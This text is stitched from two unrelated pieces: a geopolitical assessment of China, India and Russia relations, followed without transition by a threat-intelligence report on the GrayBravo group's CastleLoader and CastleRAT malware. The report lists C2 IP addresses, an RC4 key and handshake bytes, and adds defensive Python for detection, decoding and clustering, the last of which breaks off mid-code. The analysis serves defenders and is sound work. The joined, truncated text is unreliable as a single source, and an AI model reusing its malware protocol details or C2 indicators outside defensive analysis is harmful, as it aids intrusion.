China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) shows that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) spread narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely used a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.
Since approximately 2019, China has increasingly used computational propaganda and influence operation tactics likely learned by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently frame the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta banned Russian state media outlets from purchasing ads on its platforms, China Global TV Network placed at least 21 pro-Russia advertisements on Facebook in a single month.
China-India: Nascent Thaw of Longtime Tension-Filled Relationship
China-India relations have gone through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.
In recent months, China-India relations have likely returned to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely driven India to pursue improved ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” challenging years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, noted that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent rapprochement, significant hurdles and unresolved disagreements remain, making it less likely that China and India will form a long-term strategic partnership.
Political Dynamics
China’s approach to India is likely primarily driven by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to consolidate control over disputed border territories, leading to deadly skirmishes with India and cyberattacks against Indian critical infrastructure. India’s approach to China has likely been rooted in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.
Over the last year, China and India’s relations have thawed significantly, especially compared to 2020, when the China-India border dispute escalated. In 2024, China and India concluded an agreement that returned the border to its pre-2020 status, thereby completing a disengagement process and reopening border trade. India and China began re-engaging in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India resumed direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar emphasized the importance of continued cooperation between the two countries.
Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have endorsed the idea of a multipolar world, but Modi has emphasized the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely seeks to balance asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only supported inter-BRICS trade based on local currency.
Economic Dynamics
We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and the 2020 border clashes. In April 2020, India issued Press Note 3, which restricted new Chinese investment and the expansion of existing investments; new Chinese foreign direct investment in the 2021–2024 period fell by approximately 80% compared with the period before 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly rejected a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.
Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily dependent on Chinese supply chains, which very likely gives Beijing some economic leverage over India.
India faces a significant and growing trade deficit with China — reaching $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China remains India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.
India has taken actions to reduce its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has bolstered investment in domestic production and implemented protectionist policies, such as the “Make in India” policy, the Production-Linked Incentive (PLI) scheme, and, most recently, the “National Manufacturing Mission.” Threatening China’s economic and technological interests, India banned hundreds of Chinese-developed mobile applications and has pursued efforts with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to impede Apple from moving its supply chain for US phones from China to India.
Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India views the region as its primary sphere of influence. The policy, considered a “defining subset of its overall foreign policy,” hinges on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly opposes China’s Belt and Road Initiative (BRI) because New Delhi views China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and counter India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project linking China and Pakistan through roads, railways, and pipelines — which India almost certainly perceives as the most immediate threat to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to facilitate Chinese energy imports while strengthening Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major concern for India.
Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion more in 2021 than in 2018. The total value of foreign direct investment from China into India also returned to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China launched the AIIB in 2016, and the bank has dozens of approved projects in India.
Military Dynamics
We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.
India and China share a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic dispute. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry devolved into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension followed, during which each side built up troops in the contested areas. After at least 21 rounds of Senior Highest Military Commander Level (Corps Commander) talks and other efforts, India and China signed an agreement in 2024, which led to the disengagement of troops. Even with border tensions currently defused, the overarching territorial dispute very likely persists as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.
In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active throughout the IOR, often as part of air, land, and sea-based multilateral exercises but also to support the PLA Navy’s “Far Seas Protection” strategy. In addition to military exercises, the PLA makes use of commercial ports in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely perceives China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes referred to as a “string of pearls” strategy by analysts outside of China — as an encirclement of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India competed to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately called at the port over New Delhi’s objections. In 2023, India objected to the presence of a Chinese state-owned research vessel, which China very likely uses to support PLA requirements. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to build out relevant infrastructure along disputed border areas.
Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual exercise with the US took place just 62 miles from a disputed border area. In 2024, India organized the first Tarang Shakti air combat exercise, which involved ten countries, including the US. In 2025, India and the Philippines conducted a joint naval drill in the South China Sea. India almost certainly views China’s military cooperation and integration with Pakistan –– including China’s role as Islamabad’s main supplier of arms –– as a grave threat to Indian security. China is responsible for 81% of Pakistan’s arms imports.
India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade
India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and 2024, India and Russia defined their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin issued a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”
Political Dynamics
India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to support India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has called Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to reform global power dynamics and is not anti-West, in contrast to Russia’s goal of ushering in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has articulated that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, Why Bharat Matters, asserts that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”
India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its declared neutral, non-aligned strategy. India abstained on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently calls for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly maintained a warm friendship despite US and European criticism of Russia, and Modi has referred to Russia as India’s “all-weather friend and trusted ally.”
Economic Dynamics
Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has stated that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia has been India’s top supplier of crude oil, and Russian oil exceeded 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and enabled it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports remained steady in the first half of September 2025. The US subsequently imposed sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to pause new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude turned around in the Baltic Sea — an incident that oil analysts attributed to the US sanctions pressure. However, Indian Oil continued to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.
Total trade between India and Russia amounted to $68.7 billion in FY2025, likely surging as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi aims to achieve $100 billion in trade with Russia by 2030. Both countries seek to reduce reliance on the US dollar, and 90% of trade is now settled in ruble-rupee transactions. However, India’s trade with the West will likely complicate financial integration; India has been hesitant to adopt sanctions-resistant payment networks with Russia and has dismissed the idea of replacing the US dollar.
Military Dynamics
We assess that India and Russia’s military relationship is centered on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has purchased roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases include Russia’s S-400 missile defense system, which India used in May 2025 to repel Pakistani missile attacks. India and Russia have also pursued joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has stagnated on other fronts, such as joint training and exercises.
Although Moscow continues to be India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has sought to reduce its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US signed a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.
The documented poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” revealed internal documents from Russia’s state-owned defense conglomerate Rostec detailing how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.
State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation
China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.
Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.
RIC Format: Dormant, Though Russia and China Are Interested in Reviving It
The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.
Between 2002 and 2020, twenty trilateral ministerial-level meetings occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers meeting in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.
In a 2022 joint statement, China and Russia declared their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov reiterated in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely indicating India’s reserved openness to it.
BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement
The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization committed to perpetuating a multipolar world via political, security, and economic cooperation.
Though Russia and China have sought to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India views the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.
Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are based on foundational treaties. The New Development Bank (NDB) supports collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.
We assess that BRICS could also facilitate Russia and China’s efforts to develop alternatives to the US dollar, though India’s hesitation to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have explored the development of a common currency and have specifically created a cross-border digital payment and messaging system backed by cryptocurrency, called BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “identifying possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”
Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests
Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO Summit in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to focus on border security and ethnic minority separatism in China’s Xinjiang region, though it has since expanded to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India joined in 2017, after being an observer since 2005, with Russia’s support and possibly without China’s, as Beijing sponsored Pakistan’s membership that same year.
China and Russia have used the SCO to advance their geopolitical aims, including shaping future multipolarism and projecting power. In particular, China uses the SCO as a foundation for expanding an international security architecture that is consistent with the CCP’s regime security.
We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently aligned. For example, India initially did not participate in crafting an SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later joined a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped facilitate bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly objected to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is using the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.
Indicators of Deeper Trilateral Cooperation
The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.
Note: The analysis cut-off date for this report was November 10, 2025
Executive Summary
Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.
For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus, and uses novel phishing email management tooling. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.
To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).
Key Findings
Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.
One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.
Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.
Background
In September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.
Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.
Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.
Figure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)
Threat Analysis
Higher Tier Infrastructure
Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.
Figure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)
CastleRAT
CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.
Infrastructure Analysis
Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two CastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintaining concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, 104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.
Figure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)
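The redundancy pattern described above (one victim beaconing to several C2s in the same collection window, rather than migrating between them over time) is something a defender can hunt for in flow or proxy logs. The following detection logic is an added example written for this page, not Recorded Future tooling or a product query. The log format (timestamp, source, destination, port, bytes) and the internal host addresses are constructed; the two C2 addresses are the ones the report names, refanged so they match log lines.

```python
from collections import defaultdict
from datetime import datetime

# C2 addresses named in the report (refanged for log matching).
CASTLERAT_C2S = {"104.225.129.171", "144.208.126.50"}

# Constructed flow records: timestamp src dst dport bytes.
# 10.20.1.15 reaches both C2s two seconds apart (redundancy pattern);
# 10.20.1.77 reaches them on different days (migration, not flagged);
# 10.20.1.90 reaches an unrelated host and should be ignored.
SAMPLE_FLOWS = """\
2025-10-03T08:12:41Z 10.20.1.15 104.225.129.171 443 1184
2025-10-03T08:12:43Z 10.20.1.15 144.208.126.50 443 1184
2025-10-03T09:40:02Z 10.20.1.77 104.225.129.171 443 962
2025-10-04T09:41:10Z 10.20.1.77 144.208.126.50 443 962
2025-10-03T11:05:00Z 10.20.1.90 203.0.113.8 443 5120
"""


def parse_flows(text: str):
    """Parse whitespace-separated flow lines into dicts; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, dport, size = parts
        flows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "dst": dst, "dport": int(dport), "bytes": int(size),
        })
    return flows


def concurrent_c2_hosts(flows, c2_ips=CASTLERAT_C2S):
    """Return {(src, day): info} for hosts that reached two or more C2s on one day.

    Grouping by (src, day) separates the redundancy pattern (several C2s in
    one window) from a host that moved from one C2 to another over time.
    """
    seen = defaultdict(dict)  # (src, day) -> {c2_ip: first contact time}
    for f in flows:
        if f["dst"] not in c2_ips:
            continue
        key = (f["src"], f["ts"].date().isoformat())
        first = seen[key].get(f["dst"])
        if first is None or f["ts"] < first:
            seen[key][f["dst"]] = f["ts"]

    hits = {}
    for key, contacts in seen.items():
        if len(contacts) < 2:
            continue
        times = sorted(contacts.values())
        hits[key] = {
            "c2s": set(contacts),
            # How tightly the first contacts cluster; near-zero means simultaneous.
            "spread_seconds": int((times[-1] - times[0]).total_seconds()),
        }
    return hits


if __name__ == "__main__":
    for (src, day), info in concurrent_c2_hosts(parse_flows(SAMPLE_FLOWS)).items():
        print(f"{src} on {day}: {sorted(info['c2s'])} within {info['spread_seconds']}s")
```

In a real environment the C2 set would be loaded from the indicator list in Appendix H, and the day-sized window can be narrowed (for example to one hour) to match how tightly the report describes the contacts clustering.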
Notably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the server responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with 5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00 00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.
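To make the RC4-with-hard-coded-key scheme and the trailer markers concrete, here is an added example of a known-key decoder that an analyst might run over captured CastleRAT-style requests. It is illustrative code written for this page, not GrayBravo tooling or Insikt Group's analysis code. Only the RC4 cipher with a sixteen-byte key, the key “NanuchkaUpyachka”, the trailer values 01 00 00 00 and 07 00 00 00, and the fact that the implant collects ip-api[.]com geolocation data come from the report. The message layout assumed here (an RC4-encrypted body followed by a four-byte cleartext trailer), the JSON shape of the beacon, and the second key “0123456789abcdef” used as a negative control are assumptions.

```python
import json
from typing import Optional

# RC4 key from the report; the second key is hypothetical (negative control).
KNOWN_KEYS = [b"NanuchkaUpyachka", b"0123456789abcdef"]

# Trailer values from the report. Which request types they mark is
# the report's observation; the names are ours.
TRAILERS = {
    b"\x01\x00\x00\x00": "standard",
    b"\x07\x00\x00\x00": "extended-handshake",
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def classify_trailer(raw: bytes) -> str:
    """Label a request by its last four bytes (assumed to be cleartext)."""
    return TRAILERS.get(raw[-4:], "unknown")


def looks_like_beacon(plain: bytes) -> bool:
    """Heuristic: a correct key yields mostly printable ASCII that parses as JSON."""
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        return False
    if sum(ch.isprintable() for ch in text) / max(len(text), 1) < 0.95:
        return False
    try:
        json.loads(text)
    except json.JSONDecodeError:
        return False
    return True


def recover_key(raw: bytes, keys=KNOWN_KEYS) -> Optional[bytes]:
    """Try each known key against the body (everything before the trailer)."""
    body = raw[:-4]
    for key in keys:
        if looks_like_beacon(rc4(key, body)):
            return key
    return None


def decode_request(raw: bytes) -> dict:
    key = recover_key(raw)
    beacon = json.loads(rc4(key, raw[:-4])) if key else None
    return {"trailer": classify_trailer(raw), "key": key, "beacon": beacon}


# Constructed sample: a beacon carrying ip-api-style fields, encrypted with the
# report's key and terminated with the 07 00 00 00 trailer.
SAMPLE_BEACON = {"host": "WS-0042", "country": "United States", "isp": "ExampleNet"}
SAMPLE_REQUEST = (
    rc4(b"NanuchkaUpyachka", json.dumps(SAMPLE_BEACON).encode())
    + b"\x07\x00\x00\x00"
)

if __name__ == "__main__":
    print(decode_request(SAMPLE_REQUEST))
```

The plausibility check is deliberately strict (printable ASCII and valid JSON) so that a wrong key cannot produce a false positive; if the real body format turns out to be binary rather than JSON, replace `looks_like_beacon` with a check for whatever structure the samples show, keeping the key loop unchanged.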
Clustering by RC4 Key
Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree of overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.
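The clustering step above (group C2 nodes by the RC4 key extracted from each sample, then look for nodes that link otherwise separate key clusters) can be done with a small disjoint-set pass over the observations. The code below is an added example written for this page, not Insikt Group's clustering tooling. The key “NanuchkaUpyachka” and the five IP addresses are taken from the report (kept defanged); the pairing of keys to nodes and the two “hypothetical-k0x” keys are constructed to show how one node carrying two keys merges two clusters.

```python
from collections import defaultdict

# Constructed observations of (C2 node, hard-coded RC4 key from the sample).
# Only the first key and the IPs come from the report; pairings are invented.
OBSERVATIONS = [
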